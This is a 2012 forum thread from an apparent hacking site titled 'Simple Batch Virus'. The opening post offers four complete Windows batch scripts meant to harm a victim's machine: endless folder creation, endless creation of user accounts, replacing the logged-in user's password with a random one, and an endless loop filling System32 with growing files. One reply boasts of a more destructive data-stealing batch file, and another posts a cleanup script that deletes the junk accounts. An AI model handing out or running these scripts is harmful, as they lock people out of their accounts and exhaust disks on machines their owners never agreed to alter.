![]() |
|
Simple Batch Virus - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: Simple Batch Virus (/Thread-Simple-Batch-Virus) |
Simple Batch Virus - H4R0015K - 08-24-2012 Generate Infinite Folders: Code: @echo off
:loop
mkdir %random%%random%
goto :loopGenerate Infinite Users: Code: @echo off
:loop
net user/add %random% %random%
goto :loopReplace Logged In User Password With Random Password: Code: @echo off
net user %username% %random%Create A Random .txt file And Keep On Adding text To It Causing Increase In File Size Code: @echo off
cd C:\windows\system32
:loop
echo 101010101010101010010101010100101010100101010101010100101010101010 >>%random%.txt
goto :loopWill Add some more later.. RE: Simple Batch Virus - killerOfCode - 09-19-2012 hmm, this just seems to be an annoyer, rather than a virus. Remember, viruses can steal information... Also, why do you need to write your files in system32? It should work anywhere else... And another thing, C:\Windows\System32 is what I have on my Vista, not undercase words, but it doesn't matter... Just some constructive criticism.
RE: Simple Batch Virus - muhammad fakir - 09-19-2012 i think you should try my virus... but its in (bat) format.. 1)one click to corrupt all file.. 2)copy to cpy to copy to copy to copy to copy (make server work 100%) 3)copy victim data and leave 4)ddos (for web injection) i got a lot....but i am not to teach in here!
RE: Simple Batch Virus - H4R0015K - 09-19-2012 (09-19-2012, 12:36 AM)kaz_crack Wrote: hmm, this just seems to be an annoyer, rather than a virus. Remember, viruses can steal information... if you see history of viruses these are consider as virus....it is not necessary that a virus should/can only steal information...and it will work anywhere but i choose system32... (09-19-2012, 02:50 AM)muhammad fakir Wrote: i think you should try my virus... first of all no one is asking you to teach and second see what the title says RE: Simple Batch Virus - ArkPhaze - 09-24-2012 For the Random User account creation, i've already created a script that will delete all of the junk ones if something like that were to happen: Code: $Comp = "."
$UsrAccounts = get-wmiobject -class "Win32_UserAccount" -namespace "root\CIMV2" `
-filter "LocalAccount = True" -computername $Comp
write-host > del_users.txt
foreach ($objItm in $UsrAccounts) {
if ($objItm.Name -ne $env:username `
-and $objItm.Name -ne "Administrator" `
-and $objItm.Name -ne "Guest") {
$objItm.Name >> del_users.txt
}
}
$del_array = get-content del_users.txt | %{ $_ }
foreach ($str in $del_array) {
net users $str /del
}Deletes everything BUT the Administrator, Guest, and the main User account created when you first install Windows. If you have any others, you'd just have to add them in my if statement logic to avoid deleting them. RE: Simple Batch Virus - muhammad fakir - 09-24-2012 Nothing happen! :yes: I still have to do it by my own... :dash: RE: Simple Batch Virus - ArkPhaze - 09-24-2012 (09-24-2012, 04:37 AM)muhammad fakir Wrote: Nothing happen! :yes: Do what on your own? If you're talking about my script, do you realize that the above script in which I posted was a Powershell script? Do you have Powershell? Windows 7 and Windows 8 will have it installed by default. RE: Simple Batch Virus - 1234hotmaster - 09-24-2012 (09-24-2012, 05:35 AM)ArkPhaze Wrote:(09-24-2012, 04:37 AM)muhammad fakir Wrote: Nothing happen! :yes: No offense but don't mind him, Hes a bit... potato... Btw how is this a virus? Its just simple friendly commands put in a loop -_- Don't tell me people have no idea what a virus is and does... RE: Simple Batch Virus - Rodaxoleaux the Lab Rat - 09-24-2012 There are people that think you can put code into a .txt file and run it to accomplish what it says ([C++] RAT Source.) They think it's a RAT. There are people who will run "virus.exe" I know because I've gotten someone to do it. There are people who confuse DoS with DDoS. There are people that think a keylogger is a crocodile. People not knowing the true meaning of a virus does not surprise me in the slightest. |